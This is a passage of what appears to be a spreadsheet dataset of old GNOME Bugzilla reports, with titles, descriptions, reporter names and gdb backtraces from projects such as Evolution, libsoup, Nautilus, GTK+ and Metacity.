    arg = G_OPTION_ARG_STRING_ARRAY arg_data = 0xbfe215c4 description = 0x0 
    arg_description = 0x813c763 [URI...]} {
    long_name = 0x8138e25 load-session short_name = 108 'l' flags = 0 
    arg = G_OPTION_ARG_STRING arg_data = 0xbfe215cc 
    description = 0x813c968 Load a saved session from the specified file. Implies \--no-default-window\. arg_description = 0x813c76c FILENAME} {
    long_name = 0x0 short_name = 0 '\0' flags = 0 arg = G_OPTION_ARG_NONE 
    arg_data = 0x0 description = 0x0 arg_description = 0x0}}
#35 0x4549ee5c in __libc_start_main (main=0x8079e60  argc=4 
    ubp_av=0xbfe216f4 init=0x81383d0  
    fini=0x81383c0  rtld_fini=0x45478490  
    stack_end=0xbfe216ec) at libc-start.c:222
	result = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {1163739124 1162370208 0 
        -1075702072 -1078889977 1159367254} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x8064bb0 0x4549ed8d} data = {prev = 0x0 
      cleanup = 0x0 canceltype = 134630320}}}
	not_first_call = 
#36 0x08064bd1 in _start ()
No symbol table info available.
#0  0x00c1b402 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>david.hagood</t>
  </si>
  <si>
    <t>ACCERCISER-414914</t>
  </si>
  <si>
    <t>Accerciser use labelled by/label for relations</t>
  </si>
  <si>
    <t>All labels describing fields in the plugin view should have the relation label for set to indicate which controls they describe. The controls described should have the reciprocal relation labelled by set and pointing at their respective labels.
For instance the Absolute position label should have a relation label for with a target of its text field showing 0 0 by default. That text field should have a relation labelled by pointing back to the Absolute position label.
I'm not sure if this is possible in glade 3.0/3.1 yet because of a regression from 2.0 that removed most of the accessibility features from the properties dialog.</t>
  </si>
  <si>
    <t>DOXYGEN-170835</t>
  </si>
  <si>
    <t>Doesn't match members of classes in unnamed namespaces with definitions</t>
  </si>
  <si>
    <t>I use unnamed namespaces extensively and I get a lot of warnings like this from
doxygen:
Warning: no matching class member found for
  node_path_element::node_path_element()
Possible candidates:
  @0::node_path_element::node_path_element()
node_path_element is a class defined in an unnamed namespace its constructor is
defined right below it (out-of-line) in the same unnamed namespace.</t>
  </si>
  <si>
    <t>METACITY-342852</t>
  </si>
  <si>
    <t>SÃ¸ren's compositor</t>
  </si>
  <si>
    <t>build error in c-window.c if not HAVE_COMPOSITE_EXTENSIONS</t>
  </si>
  <si>
    <t>Much like #342690.
From http://jhbuild.bxlug.be/builds/2006-05-24-0016/logs/metacity/#build
  c-window.c:987: error: syntax error before '*' token
  c-window.c:988: warning: no previous prototype for 'meta_comp_window_freeze_stack'
  c-window.c: In function 'meta_comp_window_freeze_stack':
  c-window.c:989: error: 'comp_window' undeclared (first use in this function)
  c-window.c:989: error: (Each undeclared identifier is reported only once
  c-window.c:989: error: for each function it appears in.)
Because the last three functions have MetaCompWindow as param while it is not defined if not HAVE_COMPOSITE_EXTENSIONS.  #ifdef'ing those three functions and it builds.</t>
  </si>
  <si>
    <t>metacity-compositor-maint</t>
  </si>
  <si>
    <t>VALA-515828</t>
  </si>
  <si>
    <t>Error domain isn't propagated to .vapi</t>
  </si>
  <si>
    <t>Please describe the problem:
Error domain isn't propagated to .vapi
Steps to reproduce:
//blah.vala
namespace Blah {
        public errordomain BlahError {
                FOO BAR BAZ
        }// BlahError
}// Blah
// $ valac --library blah --basedir ./ blah.vala
Actual results:
/* blah.vapi generated by valac do not modify. */
[CCode (cprefix = Blah lower_case_cprefix = blah_)]
namespace Blah {
}
Expected results:
An error domain would be created in the vapi.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>taktaktaktaktaktaktaktaktaktak</t>
  </si>
  <si>
    <t>GTKHTML-206867</t>
  </si>
  <si>
    <t>capplet</t>
  </si>
  <si>
    <t>Composer Properties should open evo config dialog in composer section</t>
  </si>
  <si>
    <t>Dear bug-squasher
If I open a compose window and select Edit-&gt;Properties it doesn't do
anything... All I hear is my disk whirl and nothing is output to the
console where I started evolution from. I would expect clicking it would
open up some options window but this would also seem to be inconsistent
with the rest of Evolution where options are usually found under a Tools
menu ie. Tools-&gt;Settings or something?
I don't know if this is a new bug in 12.99 because I haven't tried it on a
previous version of Evolution.
Cheers
Tom.</t>
  </si>
  <si>
    <t>LIBGDA-502481</t>
  </si>
  <si>
    <t>gda-sql does not build out of the box on Windows</t>
  </si>
  <si>
    <t>According to http://www.gnome-db.org/GnomeDbMinGW libgda has so far only been cross-compiled to create Windows binaries. When compiling natively linking gda-sql fails because the symbol setenv() cannot be resolved.</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-138023</t>
  </si>
  <si>
    <t>gnome-stones crash report</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 1 (Yarrow)
Package: gnome-games
Severity: normal
Version: GNOME2.4.0 unspecified
Gnome-Distributor: GNOME.Org
Synopsis: gnome-stones crash report
Bugzilla-Product: gnome-games
Bugzilla-Component: gnome-stones
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.4.0.1)
Description:
Description of the crash:
just crashes 
Steps to reproduce the crash:
1. 
2. 
3. 
Expected Results:
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/gnome-stones'
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-03-24 19:55 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product gnome-games.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was cutipie10ever@hotmail.com.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>cutipie10ever</t>
  </si>
  <si>
    <t>GIMP-90914</t>
  </si>
  <si>
    <t>Unable to enter text other than default gimp</t>
  </si>
  <si>
    <t>I searched for a good 20 minutes through all dialogs for a way to change 
the default text from gimp to what I wanted using the text tool. 
If there actually is a way to do this it is way too well hidden.</t>
  </si>
  <si>
    <t>johughes</t>
  </si>
  <si>
    <t>EVOLUTION-258748</t>
  </si>
  <si>
    <t>Birthday events not entirely all day events</t>
  </si>
  <si>
    <t>Birthdays events (from Birthdays and aniversaries) shows up with a start
and end time in the calendar. In my case they starts at 02.00 and ends
24hrs later. I.e they are two hours off. When I open them in the editor
they are marked as all day events though.</t>
  </si>
  <si>
    <t>torkel</t>
  </si>
  <si>
    <t>GCM-101266</t>
  </si>
  <si>
    <t>GCM</t>
  </si>
  <si>
    <t>mainwin should be main window</t>
  </si>
  <si>
    <t>#: src/main.c:35
msgid Show the mainwin
mainwin is hackerspeak. main window is probably a much better term to
show in the interface.</t>
  </si>
  <si>
    <t>EOG-74083</t>
  </si>
  <si>
    <t>eog doesn't save preferences</t>
  </si>
  <si>
    <t>EOG presently lacks the capability of saving any preferences all changes
made frm teh preferences dialog are lost when the program is closed</t>
  </si>
  <si>
    <t>sander.vesik</t>
  </si>
  <si>
    <t>GNOME-VFS-47879</t>
  </si>
  <si>
    <t>MIME data</t>
  </si>
  <si>
    <t>Java source files sometimes appear as c or c++</t>
  </si>
  <si>
    <t xml:space="preserve">From nautilus java source files with extension .java often show as c or c++.
This appears to be because there are entries in gnome-vfs-mime-magic for
text/x-c and text/x-c++ which are given higher priority than the gnome-vfs.mime
file.  The magic entries look for /* and // both of which are likely to be also
at the beginning of a java file (and several other types of file).
In this case the extension is much more likely to be useful when trying to
distinguish java c and c++ files.
gnome-vfs version 1.0
------- Additional Comments From darin@bentspoon.com 2001-03-26 10:04:35 ----
Seems like a bad idea to assume a C or C++ comment means it's a C or C++ source
file.
------- Additional Comments From apost@cbmi.upmc.edu 2001-04-03 11:20:25 ----
The pattern I'm finding is:
If the first line is a comment beginning with // the file is interpreted as a
C++ source file.
If the first line is the beginning of a c-style comment the file is interpreted
as a C source file.
If the first line is an import ... or package ... statement the java source
file is correctly identified.
Andrew
------- Additional Comments From snickell@stanford.edu 2001-07-23 00:33:10 ----
Taking bugs previously assigned to Pavel assigning them to myself. Will parse
them out at my leisure  but many are GnomeVFS bugs we should look at for 2.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:31 -------
</t>
  </si>
  <si>
    <t>LIBSOUP-219703</t>
  </si>
  <si>
    <t>crash in exec summary double free of soup resource</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.1.0.99
Synopsis: crash in exec summary double free of soup resource
Bugzilla-Product: Evolution
Bugzilla-Component: Summary [was My Evolution]
Description:
Left evolution running crshed after acouple of hours.
The 0xabadf00d value is assigned by a debugging g_malloc() when data is
freed.
Debugging Information:
[New Thread 1024 (runnable)]
0x40aa28c9 in __wait4 () from /lib/libc.so.6
#0  0x40aa28c9 in __wait4 () from /lib/libc.so.6
#1  0x40b011cc in __DTOR_END__ () from /lib/libc.so.6
#2  0x40a07975 in waitpid (pid=7471 stat_loc=0xbffff5a4 options=0)
    at wrapsyscall.c:134
#3  0x4036b50b in gnome_segv_handle (signum=11) at gnome-init.c:664
#4  0x40a06532 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 2880303117 esi = 137318560 ebp = 3221223696 esp = 3221223684 ebx = 1084036696 edx = 1 ecx = 1085276417 eax = 0 trapno = 14 err = 4 eip = 1083944624 cs = 35 __csh = 0 eflags = 2163330 esp_at_signal = 3221223684 ss = 43 __ssh = 0 fpstate = 0xbffff688 oldmask = 2147483648 cr2 = 2880303125})
    at signals.c:96
#5  
#6  soup_context_unref (ctx=0xabadf00d) at soup-context.c:214
#7  0x409bb0b2 in soup_context_connect_cb (socket=0x0 
    status=SOUP_SOCKET_CONNECT_ERROR_NETWORK user_data=0x82f50a0)
    at soup-context.c:327
#8  0x409c8217 in soup_socket_connect_tcp_cb (socket=0x0 
    status=SOUP_SOCKET_CONNECT_ERROR_ADDR_RESOLVE data=0x82f50c8)
    at soup-socket.c:325
#9  0x409c9714 in soup_socket_new_cb (iochannel=0x8349578 condition=25 
    data=0x83485b8) at soup-socket-unix.c:1213
#10 0x4080541a in g_io_unix_dispatch (source_data=0x834be90 
    current_time=0xbffffa10 user_data=0x83485b8) at giounix.c:135
#11 0x40806956 in g_main_dispatch (dispatch_time=0xbffffa10) at gmain.c:656
#12 0x40806f11 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#13 0x40807089 in g_main_run (loop=0x80aa450) at gmain.c:935
#14 0x404bccda in gtk_main () at gtkmain.c:476
#15 0x4008a182 in bonobo_main () at bonobo-main.c:283
#16 0x0805a5fe in main (argc=3 argv=0xbffffad4) at main.c:81
#17 0x40a299cb in __libc_start_main (main=0x805a520  argc=3 
    argv=0xbffffad4 init=0x804e6bc  fini=0x805c49c  
    rtld_fini=0x4000aea0  stack_end=0xbffffacc)
    at ../sysdeps/generic/libc-start.c:92
Thread 1 (Thread 1024 (runnable)):
#0  0x40aa28c9 in __wait4 () from /lib/libc.so.6
#1  0x40b011cc in __DTOR_END__ () from /lib/libc.so.6
#2  0x40a07975 in waitpid (pid=7471 stat_loc=0xbffff5a4 options=0)
    at wrapsyscall.c:134
#3  0x4036b50b in gnome_segv_handle (signum=11) at gnome-init.c:664
#4  0x40a06532 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 2880303117 esi = 137318560 ebp = 3221223696 esp = 3221223684 ebx = 1084036696 edx = 1 ecx = 1085276417 eax = 0 trapno = 14 err = 4 eip = 1083944624 cs = 35 __csh = 0 eflags = 2163330 esp_at_signal = 3221223684 ss = 43 __ssh = 0 fpstate = 0xbffff688 oldmask = 2147483648 cr2 = 2880303125})
    at signals.c:96
#5  
#6  soup_context_unref (ctx=0xabadf00d) at soup-context.c:214
#7  0x409bb0b2 in soup_context_connect_cb (socket=0x0 
    status=SOUP_SOCKET_CONNECT_ERROR_NETWORK user_data=0x82f50a0)
    at soup-context.c:327
#8  0x409c8217 in soup_socket_connect_tcp_cb (socket=0x0 
    status=SOUP_SOCKET_CONNECT_ERROR_ADDR_RESOLVE data=0x82f50c8)
    at soup-socket.c:325
#9  0x409c9714 in soup_socket_new_cb (iochannel=0x8349578 condition=25 
    data=0x83485b8) at soup-socket-unix.c:1213
#10 0x4080541a in g_io_unix_dispatch (source_data=0x834be90 
    current_time=0xbffffa10 user_data=0x83485b8) at giounix.c:135
#11 0x40806956 in g_main_dispatch (dispatch_time=0xbffffa10) at gmain.c:656
#12 0x40806f11 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#13 0x40807089 in g_main_run (loop=0x80aa450) at gmain.c:935
#14 0x404bccda in gtk_main () at gtkmain.c:476
#15 0x4008a182 in bonobo_main () at bonobo-main.c:283
#16 0x0805a5fe in main (argc=3 argv=0xbffffad4) at main.c:81
#17 0x40a299cb in __libc_start_main (main=0x805a520  argc=3 
    argv=0xbffffad4 init=0x804e6bc  fini=0x805c49c  
    rtld_fini=0x4000aea0  stack_end=0xbffffacc)
    at ../sysdeps/generic/libc-start.c:92
#0  0x40aa28c9 in __wait4 () from /lib/libc.so.6
#0  0x40aa28c9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40b011cc in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40a07975 in waitpid (pid=7471 stat_loc=0xbffff5a4 options=0)
    at wrapsyscall.c:134
	in wrapsyscall.c
stat_loc = (int *) 0xbffff5a4
options = 0
result = 0
oldtype = 0
#3  0x4036b50b in gnome_segv_handle (signum=11) at gnome-init.c:664
664			eret = waitpid(pid 
estatus = 673
eret = 728
in_segv = 1
pid = 7471
#4  0x40a06532 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 2880303117 esi = 137318560 ebp = 3221223696 esp = 3221223684 ebx = 1084036696 edx = 1 ecx = 1085276417 eax = 0 trapno = 14 err = 4 eip = 1083944624 cs = 35 __csh = 0 eflags = 2163330 esp_at_signal = 3221223684 ss = 43 __ssh = 0 fpstate = 0xbffff688 oldmask = 2147483648 cr2 = 2880303125})
    at signals.c:96
	in signals.c
self = 0x40a0d920
in_sighandler = 0x0
#5  
No locals.
#6  soup_context_unref (ctx=0xabadf00d) at soup-context.c:214
214		--ctx-&gt;refcnt
ctx = (SoupContext *) 0xabadf00d
#7  0x409bb0b2 in soup_context_connect_cb (socket=0x0 
    status=SOUP_SOCKET_CONNECT_ERROR_NETWORK user_data=0x82f50a0)
    at soup-context.c:327
327			soup_context_unref (data-&gt;ctx)
socket = (SoupSocket *) 0xfffffe00
data = (struct SoupConnectData *) 0x82f50a0
ctx = (SoupContext *) 0x830c190
cb = 0x409c456c 
cb_data = 0x82345f0
new_conn = (SoupConnection *) 0x82f50a0
chan = (GIOChannel *) 0xbffff93c
</t>
  </si>
  <si>
    <t>alex-gone</t>
  </si>
  <si>
    <t>GNOME-PANEL-157040</t>
  </si>
  <si>
    <t>s/gtk_obox/tray_obox/ or something like this?</t>
  </si>
  <si>
    <t>We should not use GTK+ space name. I propose to rename GtkOBox to TrayOBox or
something like this. Any comment?</t>
  </si>
  <si>
    <t>GTK+-502850</t>
  </si>
  <si>
    <t>gtk-builder-convert program not found</t>
  </si>
  <si>
    <t>Please describe the problem:
gtk-builder-convert program not found in package.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:
This program is python script present in ./gtk subdirectory.</t>
  </si>
  <si>
    <t>sanpi</t>
  </si>
  <si>
    <t>RHYTHMBOX-336842</t>
  </si>
  <si>
    <t>Rhythmbox crashes when adding empty podcast feed</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Ubuntu 6.06 (dapper)
Package: rhythmbox
Severity: major
Version: GNOME2.14.0 HEAD
Gnome-Distributor: Ubuntu
Synopsis: Rhythmbox crashes when adding empty podcast feed
Bugzilla-Product: rhythmbox
Bugzilla-Component: Podcast
Bugzilla-Version: HEAD
Description:
Description of Problem:
When adding an empty feed (e.g.
http://feeds.feedburner.com/command-n/xvid) Rhythmbox crashes.
In rb-podcast-parse.c the return value of xmlCreateMemoryParserCtxt is
not checked and is NULL for this feed. This causes a SEGFAULT on the
following line when it is used.
------- Bug created by bug-buddy at 2006-04-01 15:18 -------
</t>
  </si>
  <si>
    <t>michael.spam.gnome</t>
  </si>
  <si>
    <t>EVOLUTION-249530</t>
  </si>
  <si>
    <t>maw is a cow</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Blocker
Version: GNOME2.2.2 6421
os_details: Ximian Inc.
Synopsis: maw is a cow
Bugzilla-Product: Evolution
Bugzilla-Component: Importers
Description:
he was created copy on write.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>maw</t>
  </si>
  <si>
    <t>GNOME-VFS-40574</t>
  </si>
  <si>
    <t>MIME and file/program mapping</t>
  </si>
  <si>
    <t>Create gnome-vfs-mime and gnome-vfs-mime-info</t>
  </si>
  <si>
    <t xml:space="preserve">This is a step towards moving MIME handling into gnome-vfs and out of gnomelibs. 
gnome-vfs-mime and -mime-info will start out as clones of gnome-mime and gnome-
mime-info which will become deprecated when gmc fades away.
------- Additional Comments From sullivan@eazel.com 2000-04-25 11:59:38 ----
I forgot to explicitly state that all gnome-vfs code needs to change to use 
gnome-vfs-mime.
------- Additional Comments From sullivan@eazel.com 2000-04-28 10:33:22 ----
This involves at least moving (duplicating) gnome-mime gnome-mime-info
gnome-gen-mimedb and the data files gnome.mime and mime-magic which need to be
installed in the right place. I don't like this build system futzing.
------- Additional Comments From sullivan@eazel.com 2000-05-01 09:54:43 ----
A lot of renaming and dependency-extracting to do here.
------- Additional Comments From sullivan@eazel.com 2000-05-01 16:44:44 ----
I separated out handling gnome.mime and mime-magic into a new bug (780). Not
clear yet where or how gnome-gen-mimedb is used (probably by capplet) so I'm
not letting that prevent me from marking this fixed.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:27:35 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:56 -------
Bug blocks bug(s) 40459 40575 40641.
</t>
  </si>
  <si>
    <t>EPIPHANY-105991</t>
  </si>
  <si>
    <t>Bookmarks should have context menus</t>
  </si>
  <si>
    <t>Bookmarks should have context menus
----------
Jump to
Remove
----------</t>
  </si>
  <si>
    <t>GALEON-61051</t>
  </si>
  <si>
    <t>Setting a custom stylesheet makes Galeon crash</t>
  </si>
  <si>
    <t>I set a custom stylesheet in Galeon's preferences clicked on apply and
Galeon crashed. All following restarts caused Galeon also to crash until I
removed the custom stylesheet entry from
~/.gconf/apps/galeon/Rendering/%gconf.xml.</t>
  </si>
  <si>
    <t>opqrs</t>
  </si>
  <si>
    <t>JHBUILD-365201</t>
  </si>
  <si>
    <t>[GNOME-2.18 ExternalDependency] gnome-system-monitor now needs libpcre</t>
  </si>
  <si>
    <t>http://jhbuild.bxlug.be/builds/2006-10-26-0001/logs/gnome-system-monitor/#configure
  configure: error: Package requirements (glib-2.0 &gt;= 2.9.1 libgnome-2.0 &gt;= 2.0.0 libgnomeui-2.0 &gt;= 2.0.0 gconf-2.0 &gt;= 1.1.5 libgtop-2.0 &gt;= 2.14.4 libwnck-1.0 &gt;= 2.5.0 gtk+-2.0 &gt;= 2.8.0 gnome-vfs-2.0 &gt;= 2.6.0 gnome-icon-theme &gt;= 2.15.3 libpcre &gt;= 6.7) were not met:
  No package 'libpcre' found
libpcre is fairly standard so I don't believe it will be a problem.</t>
  </si>
  <si>
    <t>GAL-219980</t>
  </si>
  <si>
    <t>Same old GAL bug?  Entering number in % Complete caused crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 1.0.2
Synopsis: Same old GAL bug?  Entering number in % Complete caused crash
Bugzilla-Product: Evolution
Bugzilla-Component: Tasks
Description:
Same old GAL bug?  Entering number in % Complete caused crash.  Seen
this before.  I thought it was fixed?
Debugging Information:
0x40f5b8c9 in __wait4 () from /lib/libc.so.6
#0  0x40f5b8c9 in __wait4 () from /lib/libc.so.6
#1  0x40fba14c in ?? () from /lib/libc.so.6
#2  0x40330975 in waitpid (pid=19662 stat_loc=0xbfffe9b8 options=0)
    at wrapsyscall.c:134
#3  0x40b6b7ff in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x4032f532 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 0 
      esi = 25 ebp = 3221220172 esp = 3221220152 ebx = 1079733540 edx = 5 
      ecx = 136582088 eax = 0 trapno = 14 err = 4 eip = 1079265632 
      cs = 35 __csh = 0 eflags = 66050 esp_at_signal = 3221220152 ss = 43 
      __ssh = 0 fpstate = 0xbfffeab8 oldmask = 2147483648 cr2 = 25})
    at signals.c:96
#5  0x40ee8c48 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#6  0x4052759d in ect_queue_redraw (text_view=0x82413c8 view_col=5 
    view_row=0) at e-cell-text.c:278
#7  0x405276fd in ect_stop_editing (text_view=0x82413c8 commit=1)
    at e-cell-text.c:343
#8  0x40528e59 in ect_leave_edit (ecell_view=0x82413c8 model_col=7 
    view_col=5 row=0 edit_context=0x0) at e-cell-text.c:1085
#9  0x40523bc3 in e_cell_leave_edit (ecell_view=0x82413c8 model_col=7 
    view_col=5 row=0 edit_context=0x0) at e-cell.c:343
#10 0x40525ffa in ecp_leave_edit (ecv=0x8241398 model_col=7 view_col=5 
    row=0 edit_context=0x0) at e-cell-popup.c:405
#11 0x40523bc3 in e_cell_leave_edit (ecell_view=0x8241398 model_col=7 
    view_col=5 row=0 edit_context=0x0) at e-cell.c:343
#12 0x4054ad84 in e_table_item_leave_edit (eti=0x823feb8)
    at e-table-item.c:3051
#13 0x40549bf5 in eti_event (item=0x823feb8 e=0xbffff148)
    at e-table-item.c:2590
#14 0x40b2fe49 in gnome_canvas_item_marshal_signal_1 (object=0x823feb8 
    func=0x40547e8c  func_data=0x0 args=0xbfffee94)
    at gnome-canvas.c:543
#15 0x40cdab98 in gtk_signal_real_emit (object=0x823feb8 signal_id=132 
    params=0xbfffee94) at gtksignal.c:1492
#16 0x40cd9103 in gtk_signal_emit_by_name (object=0x823feb8 
    name=0x40587c2f event) at gtksignal.c:618
#17 0x4050ac2b in emit_event (canvas=0x81e1db8 event=0xbffff1c4)
    at e-canvas.c:277
#18 0x4050ad3c in e_canvas_key (widget=0x81e1db8 event=0x8237858)
    at e-canvas.c:308
#19 0x40caead1 in gtk_marshal_BOOL__POINTER (object=0x81e1db8 
    func=0x4050aca8  func_data=0x0 args=0xbffff2b8)
    at gtkmarshal.c:28
#20 0x40cdab98 in gtk_signal_real_emit (object=0x81e1db8 signal_id=32 
    params=0xbffff2b8) at gtksignal.c:1492
#21 0x40cd8df0 in gtk_signal_emit (object=0x81e1db8 signal_id=32)
    at gtksignal.c:552
#22 0x40d0d85b in gtk_widget_event (widget=0x81e1db8 event=0x8237858)
    at gtkwidget.c:2864
#23 0x4049f6a1 in bonobo_plug_key_press_event (widget=0x8226a40 
    event=0x8237858) at bonobo-plug.c:480
#24 0x40caead1 in gtk_marshal_BOOL__POINTER (object=0x8226a40 
    func=0x4049f528  func_data=0x0 
    args=0xbffff62c) at gtkmarshal.c:28
#25 0x40cdab98 in gtk_signal_real_emit (object=0x8226a40 signal_id=32 
    params=0xbffff62c) at gtksignal.c:1492
#26 0x40cd8df0 in gtk_signal_emit (object=0x8226a40 signal_id=32)
    at gtksignal.c:552
#27 0x40d0d85b in gtk_widget_event (widget=0x8226a40 event=0x8237858)
    at gtkwidget.c:2864
#28 0x40cae9c6 in gtk_propagate_event (widget=0x81e1db8 event=0x8237858)
    at gtkmain.c:1360
#29 0x40cadcca in gtk_main_do_event (event=0x8237858) at gtkmain.c:818
#30 0x40d61392 in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff9b0 user_data=0x0) at gdkevents.c:2139
#31 0x40eb89f6 in g_main_dispatch (dispatch_time=0xbffff9b0) at gmain.c:656
#32 0x40eb8fb1 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#33 0x40eb9129 in g_main_run (loop=0x81a68f8) at gmain.c:935
#34 0x40cad63a in gtk_main () at gtkmain.c:524
#35 0x403df182 in bonobo_main () at bonobo-main.c:284
#36 0x80aac56 in main (argc=3 argv=0xbffffa64) at main.c:159
#0  0x40f5b8c9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40fba14c in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40330975 in waitpid (pid=19662 stat_loc=0xbfffe9b8 options=0)
    at wrapsyscall.c:134
stat_loc = (int *) 0xbfffe9b8
options = 0
result = 0
oldtype = 0
#3  0x40b6b7ff in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 1078363132
in_segv = 1
pid = 0
#4  0x4032f532 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 edi = 0 
      esi = 25 ebp = 3221220172 esp = 3221220152 ebx = 1079733540 edx = 5 
      ecx = 136582088 eax = 0 trapno = 14 err = 4 eip = 1079265632 
      cs = 35 __csh = 0 eflags = 66050 esp_at_signal = 3221220152 ss = 43 
      __ssh = 0 fpstate = 0xbfffeab8 oldmask = 2147483648 cr2 = 25})
    at signals.c:96
self = 0x40336920
in_sighandler = 0x0
#5  0x40ee8c48 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#6  0x4052759d in ect_queue_redraw (text_view=0x82413c8 view_col=5 
    view_row=0) at e-cell-text.c:278
text_view = (ECellTextView *) 0xbfffe9b8
view_col = 0
view_row = -512
#7  0x405276fd in ect_stop_editing (text_view=0x82413c8 commit=1)
    at e-cell-text.c:343
343	in e-cell-text.c
edit = (CellEdit *) 0x19
row = 0
view_col = 5
model_col = 7
old_text = 0x823fe70 Ã\002$\bÃ\214Ã»@\020
text = 0x0
</t>
  </si>
  <si>
    <t>EVOLUTION-511226</t>
  </si>
  <si>
    <t>schema string translation</t>
  </si>
  <si>
    <t>jony:
#: ../plugins/mail-notification/apps-evolution-mail-notification.schemas.in.h:6
If true then Beep otherwise will play sound file when new messages arrive.
http://live.gnome.org/TranslationProject/DevGuidelines/Enclose_literal_values_in_double_quotes
why is Beep in capital letters?</t>
  </si>
  <si>
    <t>GTK+-350023</t>
  </si>
  <si>
    <t>Running GTK+ Applications chapter does not document new GTK_DEBUG possibilities</t>
  </si>
  <si>
    <t>GtkDebugFlags has grown a couple new debug printing possibilities:
  GTK_DEBUG_ICONTHEME   = 1 &lt;&lt; 9
  GTK_DEBUG_PRINTING    = 1 &lt;&lt; 10
however they are not documented in the manuals Running GTK+ Applications chapter Enviroment variables -&gt; GTK_DEBUG</t>
  </si>
  <si>
    <t>GNOME-VFS-93712</t>
  </si>
  <si>
    <t>Module: vfolder</t>
  </si>
  <si>
    <t>capplets in applications folder don't show up anymore</t>
  </si>
  <si>
    <t>hello
recently i realized that some capplets which stores their desktop files in
applications don't show up anymore. a good example is magicdev. please
look at the bugreport number #93514 i was told from owen that magicdev is
ok and that the desktop file can be placed there. also by talking to other
people gave the proof that the stuff needs to be there and that it may be a
bug of the recently added vfolder stuff. this also affects gnome-2-0
branch. at the final result my patch seem not to be needed. maybe the
author of the vfolder stuff likes to comment on #93514 so we can close it.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-106851</t>
  </si>
  <si>
    <t>Removing program associations from mime types</t>
  </si>
  <si>
    <t>Okay
This is really really irritating.  We need to find a way to get rid of
associations after having made one. For instance I did an association on a
device icon to run gthumb (it was a partition containing pictures).  Well
it associated all devices to gthumb and I had a lot of problems.  I tried
to re-associate to nautilus but then nautilus tried to bring the partition
up as a media viewer and then media viewer crashed.
The short of it is that I wantd to get rid of all associations.  But the
mime type capplet would not do it for me.  It won't let me get rid of it. 
It also is not a very good ui wise.  As far as I know this has never been
implemented even in 1.4.x days.  I think it needs to be in there (or mime
types re-worked) to make the whole thing polished.  Definitely it should be
targetted to 2.6.
Going and removing the items in mime.keys is a bad idea. 
Anyways I'm sorry this sounds bitchy but it's been a very frustrating and
annoying experience.
sri</t>
  </si>
  <si>
    <t>PANGO-96175</t>
  </si>
  <si>
    <t>hangul-x module: a fill-only jamo sequence causes assert()</t>
  </si>
  <si>
    <t>LFILL+VFILL is theoretically a valid Hangul jamo sequence.  But it won't be
rendered (*n_glyph = 0) as any FILL is ignored by the fallback loops.  And
GTK+ assert() if hangul-x does not provide any glyph.
Opening the following data (LFILL+VFILL in UTF-8) with gedit reproduces
this problem.  And the next patch will fix it.  The patch adds this special
case to each render_syllable_with_*() functions.</t>
  </si>
  <si>
    <t>NAUTILUS-103818</t>
  </si>
  <si>
    <t>Doubleclicking opens two instances of program associated</t>
  </si>
  <si>
    <t>Doubleclicking opens two instances of program associated with the file.
Nautilus 2.0.8
It seems that nautilus reacts on the release event of the mouse when opening
files since there's two of these after the initial down event on selecting
the file. Tripple clicking (eg. once for selecting then doubleclick)
results in 3 windows opening and alot of flicker on the whole file row
since it seems  unable to decide if I want to rename the file or not.
Most of the time when I want to open a file nautilus seems to think I want
to rename it.. and I click pretty fast so it isn't that I click to slow
it's that nautilus reacts diffrently to clicking on the icon than it does
to clicking on the text.. this is wrong.
Always getting two windows of everything is REALY annoying!</t>
  </si>
  <si>
